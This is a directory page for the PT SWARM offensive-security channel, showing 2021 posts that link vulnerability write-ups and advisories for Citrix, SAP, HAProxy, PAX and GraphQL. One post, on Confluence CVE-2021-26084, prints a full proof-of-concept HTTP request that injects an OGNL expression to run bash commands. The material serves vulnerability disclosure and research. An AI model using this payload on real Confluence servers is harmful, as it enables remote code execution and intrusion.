
PT SWARM

Channel address: @ptswarm
Categories: Technologies
Language: English
Subscribers: 2.98K
Description from channel

Positive Technologies Offensive Team: twitter.com/ptswarm
This is the channel where we share articles/vulnerabilities/scripts/etc, not necessarily authored by us, that we find interesting

Ratings & Reviews

1.33 (3 reviews): 5 stars: 0, 4 stars: 0, 3 stars: 0, 2 stars: 1, 1 star: 2


The latest messages: 8

2021-09-22 19:13:23
We are thrilled to announce the following presentations at @hardwear_io, @blackhatevents, #POC2021 and @hackinparis
573 views · edited · 16:13

2021-09-21 15:37:16
RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941) – A Walk-Through
by Markus Wulftange

The vulnerability is triggerable when processing user upload requests, which can lead to Unauthorized RCE.

Contents:
• Background
• The Travelogue
• Finding A Path From Sink To Source
• Are We Still on Track?
• What's in the backpack?
• Running With Razor
• Timeline and fix

https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html
541 views · edited · 12:37

2021-09-15 17:21:53
SAP fixed Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver found by our researcher Mikhail Klyuchnikov.

CVSS 9.9

No credits from SAP again.

Advisory: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405
516 views · edited · 14:21

2021-09-14 18:46:58
PAX Technology fixed three vulnerabilities discovered by our researcher Artem Ivachev.

When chained together these vulnerabilities allow the interception of user card data and the sending of arbitrary data to the processing of the acquiring bank.
608 views · 15:46

2021-09-10 10:10:48
The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
by @jensneuse_de

The complete GraphQL security guide. 'Nuff said.

Contents:
• The 13 most common GraphQL Vulnerabilities
• Solving the 13 most common GraphQL Vulnerabilities for private APIs
• Solving the 13 most common GraphQL Vulnerabilities for public APIs

https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready
702 views · 07:10

2021-09-09 09:20:46
Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling
by Ori Hollander and Or Peles

The vulnerability, CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.

Contents:
• Technical Background
• HTTP Request Smuggling
• HAProxy’s HTTP request processing phases (simplified)
• Attack Scenario – Bypassing http-request ACLs
• What happens inside HAProxy
• Getting the HTTP response for the smuggled request
• Attack demonstration – ACL bypass
• Vulnerability Details
• Automating the Discovery
• Fixes and Workarounds

https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/
742 views · 06:20

2021-09-08 17:59:43
RCE on a backend IIS server via file upload with an atypical file extension.

More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
1.8K views · 14:59

2021-09-01 17:28:22
SAP refused to disclose which CVEs were assigned to vulnerabilities reported by our researcher Mikhail Klyuchnikov, if any.

Three subsequent letters remain unanswered.

We believe the CVEs to be CVE-2021-33690 (CVSS 9.9) and CVE-2021-33691 (CVSS 6.9) in the August hotfix.

Join the discussion on Twitter: https://twitter.com/ptswarm/status/1433070547399757824
422 views · 14:28

2021-09-01 10:01:05
Remote Code Execution on Confluence Servers write-up (CVE-2021-26084)
by rootxharsh and iamnoooob

Patch diffing the latest Confluence update results in RCE PoC.

PoC:
POST /pages/doenterpagevariables.action HTTP/2
Host: localhost
Content-Length: 301
Content-Type: application/x-www-form-urlencoded

queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027'.$cmd.'\u0027]);x.start()\u0022)}%2b\u0027

Contents:
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
684 views · edited · 07:01

2021-08-31 14:30:00
Exploiting GraphQL
by @infosec_au

Overview of GraphQL attacks.

Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion

https://blog.assetnote.io/2021/08/29/exploiting-graphql/
541 views · 11:30